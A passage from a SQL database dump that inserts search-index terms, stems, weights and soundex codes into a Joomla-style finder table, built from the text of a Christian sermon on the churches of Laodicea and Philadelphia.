(282074, 'his kingdom', 'hi kingdom', 0, 1, 1.3667, 'H25235', 1, '*'),
(282075, 'his kingdom a', 'hi kingdom a', 0, 1, 1.4333, 'H25235', 1, '*'),
(282076, 'his name in', 'hi name in', 0, 1, 1.3667, 'H250', 1, '*'),
(282077, 'holding you', 'hold you', 0, 1, 1.3667, 'H4352', 1, '*'),
(282078, 'holding you back', 'hold you back', 0, 1, 1.5333, 'H435212', 1, '*'),
(282079, 'holy life', 'holi life', 0, 1, 1.3, 'H410', 1, '*'),
(282080, 'holy life is', 'holi life is', 0, 1, 1.4, 'H412', 1, '*'),
(282081, 'hour', 'hour', 0, 0, 0.2667, 'H600', 3, '*'),
(282082, 'hour of', 'hour of', 0, 1, 1.2333, 'H610', 1, '*'),
(282083, 'hour of temptation', 'hour of temptation', 0, 1, 1.6, 'H6135135', 1, '*'),
(282084, 'how many of', 'how many of', 0, 1, 1.3667, 'H510', 1, '*'),
(282085, 'how serious', 'how serious', 0, 1, 1.3667, 'H262', 1, '*'),
(282086, 'how serious do', 'how serious do', 0, 1, 1.4667, 'H2623', 1, '*'),
(282087, 'if the true', 'if the true', 0, 1, 1.3667, 'I136', 1, '*'),
(282088, 'if you can', 'if you can', 0, 1, 1.3333, 'I125', 2, '*'),
(282089, 'in faith but', 'in faith but', 0, 1, 1.4, 'I51313', 1, '*'),
(282090, 'in heaven', 'in heaven', 0, 1, 1.3, 'I515', 1, '*'),
(282091, 'in heaven how', 'in heaven how', 0, 1, 1.4333, 'I515', 1, '*'),
(282092, 'in his kingdom', 'in his kingdom', 0, 1, 1.4667, 'I525235', 1, '*'),
(282093, 'in laodicea', 'in laodicea', 0, 1, 1.3667, 'I5432', 1, '*'),
(282094, 'in laodicea is', 'in laodicea is', 0, 1, 1.4667, 'I5432', 1, '*'),
(282095, 'in mat', 'in mat', 0, 1, 1.2, 'I530', 1, '*'),
(282096, 'in mat 24', 'in mat 24', 0, 1, 1.3, 'I530', 1, '*'),
(282097, 'in material', 'in material', 0, 1, 1.3667, 'I5364', 1, '*'),
(282098, 'in material resources', 'in material resources', 0, 1, 1.7, 'I53646262', 1, '*'),
(282099, 'in number or', 'in number or', 0, 1, 1.4, 'I516', 1, '*'),
(282100, 'in philadelphia', 'in philadelphia', 0, 1, 1.5, 'I514341', 1, '*'),
(282101, 'in philadelphia are', 'in philadelphia are', 0, 1, 1.6333, 'I5143416', 1, '*'),
(282102, 'in philadelphia the', 'in philadelphia the', 0, 1, 1.6333, 'I5143413', 1, '*'),
(282103, 'in prayer worship', 'in prayer worship', 0, 1, 1.5667, 'I51621', 1, '*'),
(282104, 'in quantity', 'in quantity', 0, 1, 1.3667, 'I5253', 1, '*'),
(282105, 'in quantity of', 'in quantity of', 0, 1, 1.4667, 'I52531', 1, '*'),
(282106, 'in scripture', 'in scripture', 0, 1, 1.4, 'I526136', 1, '*'),
(282107, 'in scripture an', 'in scripture an', 0, 1, 1.5, 'I5261365', 1, '*'),
(282108, 'in someone', 'in someone', 0, 1, 1.3333, 'I525', 1, '*'),
(282109, 'in someone who', 'in someone who', 0, 1, 1.4667, 'I525', 1, '*'),
(282110, 'in the temple', 'in the temple', 0, 1, 1.4333, 'I53514', 1, '*'),
(282111, 'in these end', 'in these end', 0, 1, 1.4, 'I53253', 1, '*'),
(282112, 'in to you', 'in to you', 0, 1, 1.3, 'I530', 1, '*'),
(282113, 'in your christian', 'in your christian', 0, 1, 1.5667, 'I5626235', 1, '*'),
(282114, 'in your hand', 'in your hand', 0, 1, 1.4, 'I5653', 1, '*'),
(282115, 'inherent', 'inher', 0, 0, 0.5333, 'I5653', 1, '*'),
(282116, 'inherent danger', 'inher danger', 0, 1, 1.5, 'I5653526', 1, '*'),
(282117, 'inherent danger of', 'inher danger of', 0, 1, 1.6, 'I56535261', 1, '*'),
(282118, 'insensitivity', 'insensit', 0, 0, 0.8667, 'I5252313', 1, '*'),
(282119, 'insensitivity blindness', 'insensit blindness', 0, 1, 1.7667, 'I5252313145352', 1, '*'),
(282120, 'insensitivity blindness to', 'insensit blindness to', 0, 1, 1.8667, 'I52523131453523', 1, '*'),
(282121, 'instructions the', 'instruct the', 0, 1, 1.5333, 'I523623523', 1, '*'),
(282122, 'instructions the glory', 'instruct the glory', 0, 1, 1.7333, 'I523623523246', 1, '*'),
(282123, 'is a description', 'is a description', 0, 1, 1.5333, 'I2326135', 1, '*'),
(282124, 'is able', 'is able', 0, 1, 1.2333, 'I214', 1, '*'),
(282125, 'is able to', 'is able to', 0, 1, 1.3333, 'I2143', 1, '*'),
(282126, 'is always an', 'is always an', 0, 1, 1.4, 'I2425', 1, '*'),
(282127, 'is being given', 'is being given', 0, 1, 1.4667, 'I215215', 1, '*'),
(282128, 'is coming when', 'is coming when', 0, 1, 1.4667, 'I2525', 1, '*'),
(282129, 'is holding', 'is holding', 0, 1, 1.3333, 'I24352', 1, '*'),
(282130, 'is holding you', 'is holding you', 0, 1, 1.4667, 'I24352', 1, '*'),
(282131, 'is in quantity', 'is in quantity', 0, 1, 1.4667, 'I25253', 1, '*'),
(282132, 'is it', 'is it', 0, 1, 1.1667, 'I230', 1, '*'),
(282133, 'is it fear', 'is it fear', 0, 1, 1.3333, 'I2316', 1, '*'),
(282134, 'is just', 'is just', 0, 1, 1.2333, 'I230', 1, '*'),
(282135, 'is just a', 'is just a', 0, 1, 1.3, 'I230', 1, '*'),
(282136, 'is no difference', 'is no difference', 0, 1, 1.5333, 'I2531652', 1, '*'),
(282137, 'is not lord', 'is not lord', 0, 1, 1.3667, 'I253463', 1, '*'),
(282138, 'is not taught', 'is not taught', 0, 1, 1.4333, 'I25323', 1, '*'),
(282139, 'is opening', 'is opening', 0, 1, 1.3333, 'I2152', 1, '*'),
(282140, 'is opening many', 'is opening many', 0, 1, 1.5, 'I21525', 1, '*'),
(282141, 'is spiritual insensitivity', 'is spiritual insensitivity', 0, 1, 1.8667, 'I216345252313', 1, '*'),
(282142, 'is the hour', 'is the hour', 0, 1, 1.3667, 'I236', 1, '*'),
(282143, 'is what happens', 'is what happens', 0, 1, 1.5, 'I23152', 1, '*'),
(282144, 'is your heart', 'is your heart', 0, 1, 1.4333, 'I263', 1, '*'),
(282145, 'isaiah 43', 'isaiah 43', 0, 1, 1.3, 'I200', 1, '*'),
(282146, 'isaiah 43 8', 'isaiah 43 8', 0, 1, 1.3667, 'I200', 1, '*'),
(282147, 'it fear', 'it fear', 0, 1, 1.2333, 'I316', 1, '*'),
(282148, 'it fear finances', 'it fear finances', 0, 1, 1.5333, 'I316152', 1, '*'),
(282149, 'it they', 'it they', 0, 1, 1.2333, 'I300', 1, '*'),
(282150, 'it they resulted', 'it they resulted', 0, 1, 1.5333, 'I36243', 1, '*'),
(282151, 'item 25', 'item 25', 0, 1, 1.2333, 'I350', 1, '*'),
(282152, 'item 25 the', 'item 25 the', 0, 1, 1.3667, 'I353', 1, '*'),
(282153, 'jesus and repent', 'jesu and repent', 0, 1, 1.5333, 'J536153', 1, '*'),
(282154, 'jesus are', 'jesu are', 0, 1, 1.3, 'J600', 1, '*'),
(282155, 'jesus are three', 'jesu are three', 0, 1, 1.5, 'J636', 1, '*'),
(282156, 'jesus from', 'jesu from', 0, 1, 1.3333, 'J165', 1, '*'),
(282157, 'jesus from their', 'jesu from their', 0, 1, 1.5333, 'J16536', 1, '*'),
(282158, 'jesus returns', 'jesu returns', 0, 1, 1.4333, 'J63652', 1, '*'),
(282159, 'jesus returns we', 'jesu returns we', 0, 1, 1.5333, 'J63652', 1, '*'),
(282160, 'jesus tells', 'jesu tells', 0, 1, 1.3667, 'J342', 1, '*'),
(282161, 'jesus tells this', 'jesu tells this', 0, 1, 1.5333, 'J34232', 1, '*'),
(282162, 'john 9 4', 'john 9 4', 0, 1, 1.2667, 'J500', 1, '*'),
(282163, 'journey the', 'journei the', 0, 1, 1.3667, 'J653', 1, '*'),
(282164, 'journey the condition', 'journei the condition', 0, 1, 1.7, 'J6532535', 1, '*'),
(282165, 'judgment to', 'judgment to', 0, 1, 1.3667, 'J3253', 1, '*'),
(282166, 'judgment to such', 'judgment to such', 0, 1, 1.5333, 'J32532', 1, '*'),
(282167, 'just a place', 'just a place', 0, 1, 1.4, 'J3142', 1, '*'),
(282168, 'k2 item 25', 'k2 item 25', 0, 1, 1.3333, 'K350', 1, '*'),
(282169, 'kept the', 'kept the', 0, 1, 1.2667, 'K130', 1, '*'),
(282170, 'kept the word', 'kept the word', 0, 1, 1.4333, 'K1363', 1, '*'),
(282171, 'kind christians', 'kind christians', 0, 1, 1.5, 'K53262352', 1, '*'),
(282172, 'kind christians rev', 'kind christians rev', 0, 1, 1.6333, 'K5326235261', 1, '*'),
(282173, 'kingdom a', 'kingdom a', 0, 1, 1.3, 'K5235', 1, '*'),
(282174, 'kingdom a spiritual', 'kingdom a spiritual', 0, 1, 1.6333, 'K523521634', 1, '*'),
(282175, 'kingdom service', 'kingdom service', 0, 1, 1.5, 'K52352612', 1, '*'),
(282176, 'kingdom service for', 'kingdom service for', 0, 1, 1.6333, 'K5235261216', 1, '*'),
(282177, 'knocking', 'knock', 0, 0, 0.5333, 'K5252', 1, '*'),
(282178, 'knocking if', 'knock if', 0, 1, 1.3667, 'K52521', 1, '*'),
(282179, 'knocking if you', 'knock if you', 0, 1, 1.5, 'K52521', 1, '*'),
(282180, 'know if', 'know if', 0, 1, 1.2333, 'K510', 1, '*'),
(282181, 'know if you', 'know if you', 0, 1, 1.3667, 'K510', 1, '*'),
(282182, 'know their', 'know their', 0, 1, 1.3333, 'K536', 1, '*'),
(282183, 'know their lord', 'know their lord', 0, 1, 1.5, 'K536463', 1, '*'),
(282184, 'laid up', 'laid up', 0, 1, 1.2333, 'L310', 1, '*'),
(282185, 'laid up in', 'laid up in', 0, 1, 1.3333, 'L315', 1, '*'),
(282186, 'laodicea', 'laodicea', 0, 0, 0.5333, 'L320', 1, '*'),
(282187, 'laodicea christians', 'laodicea christians', 0, 1, 1.6333, 'L3262352', 1, '*'),
(282188, 'laodicea christians have', 'laodicea christians have', 0, 1, 1.8, 'L32623521', 1, '*'),
(282189, 'laodicea is', 'laodicea is', 0, 1, 1.3667, 'L320', 1, '*'),
(282190, 'laodicea is a', 'laodicea is a', 0, 1, 1.4333, 'L320', 1, '*'),
(282191, 'laodicea were', 'laodicea were', 0, 1, 1.4333, 'L326', 1, '*'),
(282192, 'laodicea were spiritually', 'laodicea were spiritually', 0, 1, 1.8333, 'L32621634', 1, '*'),
(282193, 'last days they', 'last days they', 0, 1, 1.4667, 'L2323', 1, '*'),
(282194, 'leaves which', 'leav which', 0, 1, 1.4, 'L120', 1, '*'),
(282195, 'leaves which could', 'leav which could', 0, 1, 1.6, 'L1243', 1, '*'),
(282196, 'left them', 'left them', 0, 1, 1.3, 'L135', 1, '*'),
(282197, 'left them how', 'left them how', 0, 1, 1.4333, 'L135', 1, '*'),
(282198, 'life he', 'life he', 0, 1, 1.2333, 'L100', 2, '*'),
(282199, 'life he will', 'life he will', 0, 1, 1.4, 'L140', 1, '*'),
(282200, 'life is it', 'life is it', 0, 1, 1.3333, 'L123', 1, '*'),
(282201, 'life is your', 'life is your', 0, 1, 1.4, 'L126', 1, '*'),
(282202, 'life they lost', 'life they lost', 0, 1, 1.4667, 'L13423', 1, '*'),
(282203, 'like this because', 'like this because', 0, 1, 1.5667, 'L23212', 1, '*'),
(282204, 'little strength', 'littl strength', 0, 1, 1.5, 'L34236523', 1, '*'),
(282205, 'little strength but', 'littl strength but', 0, 1, 1.6333, 'L3423652313', 1, '*'),
(282206, 'lives today and', 'live today and', 0, 1, 1.5, 'L12353', 1, '*'),
(282207, 'lives with', 'live with', 0, 1, 1.3333, 'L123', 1, '*'),
(282208, 'lives with such', 'live with such', 0, 1, 1.5, 'L1232', 1, '*'),
(282209, 'living a', 'live a', 0, 1, 1.2667, 'L152', 1, '*'),
(282210, 'living a holy', 'live a holy', 0, 1, 1.4333, 'L1524', 1, '*'),
(282211, 'living our', 'live our', 0, 1, 1.3333, 'L1526', 1, '*'),
(282212, 'living our lives', 'live our lives', 0, 1, 1.5333, 'L1526412', 1, '*'),
(282213, 'local', 'local', 0, 0, 0.3333, 'L240', 1, '*'),
(282214, 'local church', 'local church', 0, 1, 1.4, 'L24262', 1, '*'),
(282215, 'local church services', 'local church services', 0, 1, 1.7, 'L24262612', 1, '*'),
(282216, 'lord a', 'lord a', 0, 1, 1.2, 'L630', 1, '*'),
(282217, 'lord a body', 'lord a body', 0, 1, 1.3667, 'L6313', 1, '*'),
(282218, 'lord covered', 'lord covered', 0, 1, 1.4, 'L632163', 1, '*'),
(282219, 'lord covered adam', 'lord covered adam', 0, 1, 1.5667, 'L6321635', 1, '*'),
(282220, 'lord they', 'lord they', 0, 1, 1.3, 'L630', 1, '*'),
(282221, 'lord they have', 'lord they have', 0, 1, 1.4667, 'L631', 1, '*'),
(282222, 'lost it', 'lost it', 0, 1, 1.2333, 'L230', 1, '*'),
(282223, 'lost it they', 'lost it they', 0, 1, 1.4, 'L230', 1, '*'),
(282224, 'lost the life', 'lost the life', 0, 1, 1.4333, 'L2341', 1, '*'),
(282225, 'lost the synagogue', 'lost the synagogue', 0, 1, 1.6, 'L23252', 1, '*'),
(282226, 'loves you', 'love you', 0, 1, 1.3, 'L120', 1, '*'),
(282227, 'loves you start', 'love you start', 0, 1, 1.5, 'L12363', 1, '*'),
(282228, 'luke 2', 'luke 2', 0, 1, 1.2, 'L200', 1, '*'),
(282229, 'luke 2 43-44', 'luke 2 43-44', 0, 1, 1.4, 'L200', 1, '*'),
(282230, 'luke warmness', 'luke warmness', 0, 1, 1.4333, 'L2652', 1, '*'),
(282231, 'luke warmness when', 'luke warmness when', 0, 1, 1.6, 'L26525', 1, '*'),
(282232, 'lukewarm and', 'lukewarm and', 0, 1, 1.4, 'L2653', 1, '*'),
(282233, 'lukewarm and christ', 'lukewarm and christ', 0, 1, 1.6333, 'L26532623', 1, '*'),
(282234, 'lukewarm ask', 'lukewarm ask', 0, 1, 1.4, 'L2652', 1, '*'),
(282235, 'lukewarm ask yourself', 'lukewarm ask yourself', 0, 1, 1.7, 'L26526241', 1, '*'),
(282236, 'major things', 'major things', 0, 1, 1.4, 'M26352', 1, '*'),
(282237, 'major things that', 'major things that', 0, 1, 1.5667, 'M263523', 1, '*'),
(282238, 'make them strong', 'make them strong', 0, 1, 1.5333, 'M23523652', 1, '*'),
(282239, 'make you a', 'make you a', 0, 1, 1.3333, 'M200', 1, '*'),
(282240, 'man that violates', 'man that violates', 0, 1, 1.5667, 'M31432', 1, '*'),
(282241, 'man work', 'man work', 0, 1, 1.2667, 'M620', 1, '*'),
(282242, 'man work john', 'man work john', 0, 1, 1.4333, 'M625', 1, '*'),
(282243, 'many of', 'mani of', 0, 1, 1.2333, 'M100', 1, '*'),
(282244, 'many of us', 'mani of us', 0, 1, 1.3333, 'M120', 1, '*'),
(282245, 'many tremendous', 'mani tremendous', 0, 1, 1.5, 'M36532', 1, '*'),
(282246, 'many tremendous doors', 'mani tremendous doors', 0, 1, 1.7, 'M36532362', 1, '*'),
(282247, 'mark 24', 'mark 24', 0, 1, 1.2333, 'M620', 1, '*'),
(282248, 'mark 24 3,4', 'mark 24 3,4', 0, 1, 1.3667, 'M620', 1, '*'),
(282249, 'mat 24 vs', 'mat 24 vs', 0, 1, 1.3, 'M312', 1, '*'),
(282250, 'material resources', 'materi resources', 0, 1, 1.6, 'M3646262', 1, '*'),
(282251, 'material resources but', 'materi resources but', 0, 1, 1.7333, 'M364626213', 1, '*'),
(282252, 'matthew 13 15-16', 'matthew 13 15-16', 0, 1, 1.5333, 'M300', 1, '*'),
(282253, 'matthew6', 'matthew6', 0, 0, 0.5333, 'M300', 1, '*'),
(282254, 'matthew6 19-20', 'matthew6 19-20', 0, 1, 1.4667, 'M300', 1, '*'),
(282255, 'matthew6 19-20 your', 'matthew6 19-20 your', 0, 1, 1.6333, 'M360', 1, '*'),
(282256, 'may feel', 'mai feel', 0, 1, 1.2667, 'M140', 1, '*'),
(282257, 'may feel you', 'mai feel you', 0, 1, 1.4, 'M140', 1, '*'),
(282258, 'may have', 'mai have', 0, 1, 1.2667, 'M100', 1, '*'),
(282259, 'may have been', 'mai have been', 0, 1, 1.4333, 'M150', 1, '*'),
(282260, 'meeting could', 'meet could', 0, 1, 1.4333, 'M35243', 1, '*'),
(282261, 'meeting could also', 'meet could also', 0, 1, 1.6, 'M3524342', 1, '*'),
(282262, 'mighty pillar', 'mighti pillar', 0, 1, 1.4333, 'M23146', 1, '*'),
(282263, 'mighty pillar in', 'mighti pillar in', 0, 1, 1.5333, 'M231465', 1, '*'),
(282264, 'mouth god\'s', 'mouth god', 0, 1, 1.3667, 'M3232', 1, '*'),
(282265, 'mouth god\'s strength', 'mouth god strength', 0, 1, 1.6667, 'M323236523', 1, '*'),
(282266, 'much of you', 'much of you', 0, 1, 1.3667, 'M210', 1, '*'),
(282267, 'must be found', 'must be found', 0, 1, 1.4333, 'M23153', 1, '*'),
(282268, 'must be remedied', 'must be remedied', 0, 1, 1.5333, 'M231653', 1, '*'),
(282269, 'must take in', 'must take in', 0, 1, 1.4, 'M2325', 1, '*'),
(282270, 'naked gen', 'nake gen', 0, 1, 1.3, 'N2325', 1, '*'),
(282271, 'naked gen 2', 'nake gen 2', 0, 1, 1.3667, 'N2325', 1, '*'),
(282272, 'nakedness', 'naked', 0, 0, 0.6, 'N2352', 1, '*'),
(282273, 'nakedness the', 'naked the', 0, 1, 1.4333, 'N23523', 1, '*'),
(282274, 'nakedness the believers', 'naked the believers', 0, 1, 1.7667, 'N2352314162', 1, '*'),
(282275, 'name in', 'name in', 0, 1, 1.2333, 'N000', 1, '*'),
(282276, 'name in these', 'name in these', 0, 1, 1.4333, 'N320', 1, '*'),
(282277, 'never give', 'never give', 0, 1, 1.3333, 'N1621', 1, '*'),
(282278, 'never give up', 'never give up', 0, 1, 1.4333, 'N1621', 1, '*'),
(282279, 'night is coming', 'night is coming', 0, 1, 1.5, 'N23252', 1, '*'),
(282280, 'no difference', 'no difference', 0, 1, 1.4333, 'N31652', 1, '*'),
(282281, 'no difference really', 'no difference really', 0, 1, 1.6667, 'N3165264', 1, '*'),
(282282, 'no man', 'no man', 0, 1, 1.2, 'N000', 2, '*'),
(282283, 'no man work', 'no man work', 0, 1, 1.3667, 'N620', 1, '*'),
(282284, 'not believed', 'not believed', 0, 1, 1.4, 'N31413', 1, '*'),
(282285, 'not believed false', 'not believed false', 0, 1, 1.6, 'N31413142', 1, '*'),
(282286, 'not cover', 'not cover', 0, 1, 1.3, 'N3216', 1, '*'),
(282287, 'not cover their', 'not cover their', 0, 1, 1.5, 'N321636', 1, '*'),
(282288, 'not denied', 'not denied', 0, 1, 1.3333, 'N353', 1, '*'),
(282289, 'not denied him', 'not denied him', 0, 1, 1.4667, 'N3535', 1, '*'),
(282290, 'not know that', 'not know that', 0, 1, 1.4333, 'N3253', 1, '*'),
(282291, 'not know their', 'not know their', 0, 1, 1.4667, 'N32536', 1, '*'),
(282292, 'not lord', 'not lord', 0, 1, 1.2667, 'N3463', 1, '*'),
(282293, 'not lord a', 'not lord a', 0, 1, 1.3333, 'N3463', 1, '*'),
(282294, 'not said', 'not said', 0, 1, 1.2667, 'N323', 1, '*'),
(282295, 'not said that', 'not said that', 0, 1, 1.4333, 'N323', 1, '*'),
(282296, 'not taught', 'not taught', 0, 1, 1.3333, 'N323', 1, '*'),
(282297, 'not taught and', 'not taught and', 0, 1, 1.4667, 'N32353', 1, '*'),
(282298, 'not want you', 'not want you', 0, 1, 1.4, 'N353', 1, '*'),
(282299, 'nothing that', 'noth that', 0, 1, 1.4, 'N3523', 1, '*'),
(282300, 'nothing that could', 'noth that could', 0, 1, 1.6, 'N3523243', 1, '*'),
(282301, 'number or', 'number or', 0, 1, 1.3, 'N160', 1, '*'),
(282302, 'number or in', 'number or in', 0, 1, 1.4, 'N165', 1, '*'),
(282303, 'of a backslidden', 'of a backslidden', 0, 1, 1.5333, 'O12435', 1, '*'),
(282304, 'of backslidden', 'of backslidden', 0, 1, 1.4667, 'O12435', 1, '*'),
(282305, 'of backslidden christians', 'of backslidden christians', 0, 1, 1.8333, 'O12435262352', 1, '*'),
(282306, 'of christians meeting', 'of christians meeting', 0, 1, 1.7, 'O12623525352', 1, '*'),
(282307, 'of deceitfulness', 'of deceitfulness', 0, 1, 1.5333, 'O13231452', 1, '*'),
(282308, 'of deceitfulness of', 'of deceitfulness of', 0, 1, 1.6333, 'O132314521', 1, '*'),
(282309, 'of failing', 'of failing', 0, 1, 1.3333, 'O1452', 1, '*'),
(282310, 'of failing to', 'of failing to', 0, 1, 1.4333, 'O14523', 1, '*'),
(282311, 'of god 3', 'of god 3', 0, 1, 1.2667, 'O123', 2, '*'),
(282312, 'of god rev', 'of god rev', 0, 1, 1.3333, 'O12361', 1, '*'),
(282313, 'of god their', 'of god their', 0, 1, 1.4, 'O1236', 1, '*'),
(282314, 'of jesus are', 'of jesus are', 0, 1, 1.4, 'O126', 1, '*'),
(282315, 'of jesus from', 'of jesus from', 0, 1, 1.4333, 'O12165', 1, '*'),
(282316, 'of life they', 'of life they', 0, 1, 1.4, 'O1413', 1, '*'),
(282317, 'of opportunity', 'of opportunity', 0, 1, 1.4667, 'O16353', 1, '*'),
(282318, 'of opportunity and', 'of opportunity and', 0, 1, 1.6, 'O1635353', 1, '*'),
(282319, 'of riches and', 'of riches and', 0, 1, 1.4333, 'O16253', 1, '*'),
(282320, 'of satan if', 'of satan if', 0, 1, 1.3667, 'O12351', 1, '*'),
(282321, 'of satan is', 'of satan is', 0, 1, 1.3667, 'O12352', 1, '*'),
(282322, 'of such kind', 'of such kind', 0, 1, 1.4, 'O1253', 1, '*'),
(282323, 'of temptation', 'of temptation', 0, 1, 1.4333, 'O135135', 1, '*'),
(282324, 'of temptation this', 'of temptation this', 0, 1, 1.6, 'O13513532', 1, '*'),
(282325, 'of their luke', 'of their luke', 0, 1, 1.4333, 'O13642', 1, '*'),
(282326, 'of treasures', 'of treasures', 0, 1, 1.4, 'O136262', 1, '*'),
(282327, 'of treasures you', 'of treasures you', 0, 1, 1.5333, 'O136262', 1, '*'),
(282328, 'of us', 'of us', 0, 1, 1.1667, 'O120', 1, '*'),
(282329, 'of us are', 'of us are', 0, 1, 1.3, 'O126', 1, '*'),
(282330, 'of worship', 'of worship', 0, 1, 1.3333, 'O1621', 1, '*'),
(282331, 'of worship where', 'of worship where', 0, 1, 1.5333, 'O16216', 1, '*'),
(282332, 'of you is', 'of you is', 0, 1, 1.3, 'O120', 1, '*'),
(282333, 'on the things', 'on the things', 0, 1, 1.4333, 'O5352', 1, '*'),
(282334, 'once been', 'onc been', 0, 1, 1.3, 'O5215', 1, '*'),
(282335, 'once been in', 'onc been in', 0, 1, 1.4, 'O5215', 1, '*'),
(282336, 'only a little', 'onli a little', 0, 1, 1.4333, 'O5434', 1, '*'),
(282337, 'open door', 'open door', 0, 1, 1.3, 'O1536', 1, '*'),
(282338, 'open door in', 'open door in', 0, 1, 1.4, 'O15365', 1, '*'),
(282339, 'open door refers', 'open door refers', 0, 1, 1.5333, 'O1536162', 1, '*'),
(282340, 'open the', 'open the', 0, 1, 1.2667, 'O153', 1, '*'),
(282341, 'open the door', 'open the door', 0, 1, 1.4333, 'O1536', 1, '*'),
(282342, 'opening', 'open', 0, 0, 0.4667, 'O152', 1, '*'),
(282343, 'opening many', 'open many', 0, 1, 1.4, 'O1525', 1, '*'),
(282344, 'opening many tremendous', 'open many tremendous', 0, 1, 1.7667, 'O152536532', 1, '*'),
(282345, 'opening to', 'open to', 0, 1, 1.3333, 'O1523', 1, '*'),
(282346, 'opening to preach', 'open to preach', 0, 1, 1.5667, 'O1523162', 1, '*'),
(282347, 'opens let', 'open let', 0, 1, 1.3, 'O15243', 1, '*'),
(282348, 'opens let me', 'open let me', 0, 1, 1.4, 'O152435', 1, '*'),
(282349, 'opportunity and', 'opportun and', 0, 1, 1.5, 'O1635353', 1, '*'),
(282350, 'opportunity and there', 'opportun and there', 0, 1, 1.7, 'O16353536', 1, '*'),
(282351, 'or challenges never', 'or challenges never', 0, 1, 1.6333, 'O62452516', 1, '*'),
(282352, 'or in material', 'or in material', 0, 1, 1.4667, 'O65364', 1, '*'),
(282353, 'other behold', 'other behold', 0, 1, 1.4, 'O36143', 1, '*'),
(282354, 'other behold he', 'other behold he', 0, 1, 1.5, 'O36143', 1, '*'),
(282355, 'our lives with', 'our lives with', 0, 1, 1.4667, 'O64123', 1, '*'),
(282356, 'people is the', 'peopl is the', 0, 1, 1.4333, 'P423', 1, '*'),
(282357, 'persecution', 'persecut', 0, 0, 0.7333, 'P6235', 1, '*'),
(282358, 'persecution yet', 'persecut yet', 0, 1, 1.5, 'P62353', 1, '*'),
(282359, 'persecution yet they', 'persecut yet they', 0, 1, 1.6667, 'P62353', 1, '*'),
(282360, 'philadelphia', 'philadelphia', 0, 0, 0.8, 'P4341', 1, '*'),
(282361, 'philadelphia are', 'philadelphia are', 0, 1, 1.5333, 'P43416', 1, '*'),
(282362, 'philadelphia are example', 'philadelphia are example', 0, 1, 1.8, 'P434162514', 1, '*'),
(282363, 'philadelphia the', 'philadelphia the', 0, 1, 1.5333, 'P43413', 1, '*'),
(282364, 'philadelphia the christians', 'philadelphia the christians', 0, 1, 1.9, 'P43413262352', 1, '*'),
(282365, 'pillar', 'pillar', 0, 0, 0.4, 'P460', 1, '*'),
(282366, 'pillar in', 'pillar in', 0, 1, 1.3, 'P465', 1, '*'),
(282367, 'pillar in his', 'pillar in his', 0, 1, 1.4333, 'P4652', 1, '*'),
(282368, 'pillars', 'pillar', 0, 0, 0.4667, 'P462', 1, '*'),
(282369, 'pillars in', 'pillar in', 0, 1, 1.3333, 'P4625', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(282370, 'pillars in the', 'pillar in the', 0, 1, 1.4667, 'P46253', 1, '*'),
(282371, 'place of worship', 'place of worship', 0, 1, 1.5333, 'P421621', 1, '*'),
(282372, 'poor matthew6', 'poor matthew6', 0, 1, 1.4333, 'P653', 1, '*'),
(282373, 'poor matthew6 19-20', 'poor matthew6 19-20', 0, 1, 1.6333, 'P653', 1, '*'),
(282374, 'position that', 'posit that', 0, 1, 1.4333, 'P2353', 1, '*'),
(282375, 'position that a', 'posit that a', 0, 1, 1.5, 'P2353', 1, '*'),
(282376, 'prayer worship', 'prayer worship', 0, 1, 1.4667, 'P621', 1, '*'),
(282377, 'prayer worship and', 'prayer worship and', 0, 1, 1.6, 'P62153', 1, '*'),
(282378, 'preach', 'preach', 0, 0, 0.4, 'P620', 1, '*'),
(282379, 'preach the', 'preach the', 0, 1, 1.3333, 'P623', 1, '*'),
(282380, 'preach the gospel', 'preach the gospel', 0, 1, 1.5667, 'P623214', 1, '*'),
(282381, 'pretends', 'pretend', 0, 0, 0.5333, 'P63532', 1, '*'),
(282382, 'pretends to', 'pretend to', 0, 1, 1.3667, 'P635323', 1, '*'),
(282383, 'pretends to be', 'pretend to be', 0, 1, 1.4667, 'P6353231', 1, '*'),
(282384, 'pride of', 'pride of', 0, 1, 1.2667, 'P631', 1, '*'),
(282385, 'pride of life', 'pride of life', 0, 1, 1.4333, 'P63141', 1, '*'),
(282386, 'problem is that', 'problem is that', 0, 1, 1.5, 'P614523', 1, '*'),
(282387, 'promised an', 'promis an', 0, 1, 1.3667, 'P65235', 1, '*'),
(282388, 'promised an open', 'promis an open', 0, 1, 1.5333, 'P6523515', 1, '*'),
(282389, 'promised that', 'promis that', 0, 1, 1.4333, 'P6523', 1, '*'),
(282390, 'promised that they', 'promis that they', 0, 1, 1.6, 'P6523', 1, '*'),
(282391, 'quantity', 'quantiti', 0, 0, 0.5333, 'Q530', 1, '*'),
(282392, 'quantity of', 'quantiti of', 0, 1, 1.3667, 'Q531', 1, '*'),
(282393, 'quantity of treasures', 'quantiti of treasures', 0, 1, 1.7, 'Q53136262', 1, '*'),
(282394, 'questions are', 'question are', 0, 1, 1.4333, 'Q3526', 1, '*'),
(282395, 'questions are you', 'question are you', 0, 1, 1.5667, 'Q3526', 1, '*'),
(282396, 'read luke', 'read luke', 0, 1, 1.3, 'R342', 1, '*'),
(282397, 'read luke 2', 'read luke 2', 0, 1, 1.3667, 'R342', 1, '*'),
(282398, 'really in', 'realli in', 0, 1, 1.3, 'R450', 1, '*'),
(282399, 'really in someone', 'realli in someone', 0, 1, 1.5667, 'R4525', 1, '*'),
(282400, 'really repented', 'realli repented', 0, 1, 1.5, 'R46153', 1, '*'),
(282401, 'really repented god', 'realli repented god', 0, 1, 1.6333, 'R4615323', 1, '*'),
(282402, 'received god\'s', 'receiv god', 0, 1, 1.4667, 'R213232', 1, '*'),
(282403, 'received god\'s judgment', 'receiv god judgment', 0, 1, 1.7667, 'R2132323253', 1, '*'),
(282404, 'refers to an', 'refer to an', 0, 1, 1.4, 'R16235', 1, '*'),
(282405, 'remedied', 'remedi', 0, 0, 0.5333, 'R530', 1, '*'),
(282406, 'remedied jesus', 'remedi jesus', 0, 1, 1.4667, 'R532', 1, '*'),
(282407, 'remedied jesus tells', 'remedi jesus tells', 0, 1, 1.6667, 'R532342', 1, '*'),
(282408, 'repent of their', 'repent of their', 0, 1, 1.5, 'R153136', 1, '*'),
(282409, 'repented', 'repent', 0, 0, 0.5333, 'R153', 1, '*'),
(282410, 'repented god', 'repent god', 0, 1, 1.4, 'R15323', 1, '*'),
(282411, 'repented god therefore', 'repent god therefore', 0, 1, 1.7333, 'R15323616', 1, '*'),
(282412, 'resources but', 'resourc but', 0, 1, 1.4333, 'R26213', 1, '*'),
